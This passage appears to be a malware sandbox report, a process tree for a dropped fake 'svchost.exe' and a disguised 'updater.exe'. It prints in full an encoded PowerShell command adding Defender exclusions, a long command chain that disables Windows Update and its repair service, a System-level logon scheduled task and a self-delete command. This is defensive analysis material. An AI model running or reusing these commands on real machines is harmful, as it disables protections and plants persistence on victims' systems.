        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1600
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1280
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3940
      - C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        6⤵
        Drops file in Windows directory
        
        PID:2164
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        6⤵
        
        PID:3656
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2280
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"
        6⤵
        
        PID:804
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4240
        
        C:\Users\Admin\Chrome\updater.exe
        
        C:\Users\Admin\Chrome\updater.exe
        7⤵
        Executes dropped EXE
        
        PID:4948
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"
        8⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        
        PID:4076
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        9⤵
        
        PID:4408
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1468
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        9⤵
        
        PID:3880
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:3640
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        10⤵
        Launches sc.exe
        
        PID:1720
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        10⤵
        Launches sc.exe
        
        PID:672
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        10⤵
        Launches sc.exe
        
        PID:3120
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        10⤵
        Launches sc.exe
        
        PID:3744
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        10⤵
        Launches sc.exe
        
        PID:3248
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        10⤵
        Launches sc.exe
        
        PID:1984
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:3724
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        10⤵
        Launches sc.exe
        
        PID:2492
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:1816
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        10⤵
        Launches sc.exe
        
        PID:2788
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:3432
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        10⤵
        Launches sc.exe
        
        PID:1048
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:3620
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        10⤵
        Launches sc.exe
        
        PID:2716
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:4496
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2136
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3332
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        10⤵
        
        PID:1736
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        10⤵
        
        PID:3016
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        10⤵
        
        PID:1552
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        10⤵
        
        PID:2776
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        10⤵
        
        PID:2940
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        10⤵
        
        PID:2620
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        10⤵
        
        PID:2680
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        10⤵
        
        PID:4148
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        10⤵
        
        PID:952
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        10⤵
        
        PID:2008
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        10⤵
        
        PID:2788
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        10⤵
        
        PID:4160
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        10⤵
        
        PID:1936
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        9⤵
        Power Settings
        
        PID:2672
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4012
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        10⤵
        Power Settings
        
        PID:2420
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        10⤵
        Power Settings
        
        PID:2340
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        10⤵
        Power Settings
        
        PID:4428
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        10⤵
        Power Settings
        
        PID:220
        
        C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        9⤵
        
        PID:4512
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "sjrcqeodaodte"
        10⤵
        
        PID:2040
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        6⤵
        
        PID:2064
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2420
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        7⤵
        
        PID:2368
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5096
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      C:\Users\Admin\AppData\Local\Temp\svchost.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3520
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1124
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4348
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        6⤵
        
        PID:2024
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:1816
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        7⤵
        Launches sc.exe
        
        PID:1720
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        7⤵
        Launches sc.exe
        
        PID:4468
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:2100
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:4676
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        7⤵
        Launches sc.exe
        
        PID:2016
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:4916
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        7⤵
        Launches sc.exe
        
        PID:1984
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:3936
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        7⤵
        Launches sc.exe
        
        PID:600
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:4148
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        7⤵
        Launches sc.exe
        
        PID:760
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:1436
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        7⤵
        Launches sc.exe
        
        PID:3644
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:4860
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2488
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2624
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        7⤵
        
        PID:852
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        7⤵
        
        PID:3948
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        7⤵
        
        PID:3820
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        7⤵
        
        PID:4112
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        7⤵
        
        PID:2188
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        7⤵
        
        PID:1040
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        7⤵
        
        PID:4756
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        7⤵
        
        PID:5076
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        7⤵
        
        PID:3896
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        7⤵
        
        PID:4668
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        7⤵
        
        PID:2420
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        7⤵
        
        PID:3092
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        7⤵
        
        PID:368
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:4112
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4936
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4324
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2340
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3724
      - C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        6⤵
        Drops file in Windows directory
        
        PID:4244
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        6⤵
        
        PID:1736
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2392
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"
        6⤵
        
        PID:4520
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1976
        
        C:\Users\Admin\Chrome\updater.exe
        
        C:\Users\Admin\Chrome\updater.exe
        7⤵
        Executes dropped EXE
        
        PID:852
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"
        8⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:1400
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        9⤵
        
        PID:4312
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3196
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        9⤵
        
        PID:4656
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:4368
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        10⤵
        Launches sc.exe
        
        PID:1048
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        10⤵
        Launches sc.exe
        
        PID:4108
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        10⤵
        Launches sc.exe
        
        PID:1204
        
        C:\Windows\system32\sc.exe
        
